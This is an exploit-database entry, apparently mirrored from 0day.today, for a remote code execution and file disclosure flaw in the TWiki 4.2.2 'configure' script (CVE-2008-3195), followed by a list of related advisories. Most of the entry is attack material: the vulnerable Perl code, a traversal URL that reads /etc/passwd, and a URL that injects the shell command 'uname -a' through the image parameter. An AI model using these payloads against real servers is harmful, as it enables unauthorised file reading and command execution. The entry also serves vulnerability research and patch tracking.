Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtWebDEViL1337DAY-ID-3705
HistorySep 21, 2008 - 12:00 a.m.

TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability

2008-09-2100:00:00
webDEViL
0day.today
28
JSON

Exploit for cgi platform in category web applications

===========================================================
TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability
===========================================================


#-----------TWiki Remote Code Execution <= 4.2.2--------------------#

# ----------CVE Id(s)      : CVE-2008-3195--------------------------#

# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights

The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion.

According to TWiki's documentation this file is meant to be protected with .htaccess, but many a times you find it is not ;)

Vulnerable code:

if( $action eq 'image' ) {
    # SMELL: this call is correct, but causes a perl error

    # on some versions of CGI.pm
    # print $query->header(-type => $query->param('type'));
    # So use this instead:
    print 'Content-type: '.$query->param('type')."\n\n";

    if( open(F, 'logos/'.$query->param('image' ))) {
        local $/ = undef;
        print <F>;
        close(F);
    }

http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain

http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain



#  0day.today [2018-03-05]  #

Related

seebug 2
openvas 4
nvd 2
debian 1
prion 2
nessus 4
osv 1
cert 1
packetstorm 1
cvelist 1
cve 2
exploitpack 1
freebsd 1
ubuntucve 1
exploitdb 2
seebug
seebug
TWiki &lt;= 4.2.2 (action) Remote Code Execution Vulnerability
2008-09-22 00:00:00
TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability
2014-07-01 00:00:00
openvas
openvas
FreeBSD Ports: twiki
2008-09-17 00:00:00
Debian Security Advisory DSA 1639-1 (twiki)
2008-09-24 00:00:00
Debian: Security Advisory (DSA-1639-1)
2008-09-24 00:00:00
nvd
nvd
CVE-2008-3195
2008-09-18 15:04:27
CVE-2008-4112
2008-09-16 23:00:01
debian
debian
[SECURITY] [DSA 1639-1] New twiki packages execution of arbitrary code
2008-09-19 19:25:13
prion
prion
Directory traversal
2008-09-18 15:04:00
Design/Logic Flaw
2008-09-16 23:00:00
nessus
nessus
FreeBSD : bmon -- unsafe set-user-ID application (18)
2004-10-18 00:00:00
TWiki bin/configure 'image' Parameter Traversal Arbitrary File Access/Execution
2008-08-23 00:00:00
FreeBSD : twiki -- Arbitrary code execution in session files (9227dcaf-827f-11dd-9cd7-0050568452ac)
2008-09-15 00:00:00
osv
osv
twiki - command execution
2008-09-19 00:00:00
cert
cert
TWiki command execution vulnerability
2008-09-12 00:00:00
packetstorm
packetstorm
twiki-exec.txt
2008-09-22 00:00:00
cvelist
cvelist
CVE-2008-3195
2008-09-17 18:06:00
cve
cve
CVE-2008-3195
2008-09-18 15:04:27
CVE-2008-4112
2008-09-16 23:00:01
exploitpack
exploitpack
TWiki 4.2.2 - action Remote Code Execution
2008-09-21 00:00:00
freebsd
freebsd
twiki -- Arbitrary code execution in session files
2008-08-05 00:00:00
ubuntucve
ubuntucve
CVE-2008-3195
2008-09-18 00:00:00
exploitdb
exploitdb
TWiki 4.2.2 - &#039;action&#039; Remote Code Execution
2008-09-21 00:00:00
TWiki 4.2.0 - &#039;configure&#039; Remote File Disclosure
2008-08-19 00:00:00
JSON
Related for 1337DAY-ID-3705
seebug2openvas4nvd2debian1prion2nessus4osv1cert1packetstorm1cvelist1cve2exploitpack1freebsd1ubuntucve1exploitdb2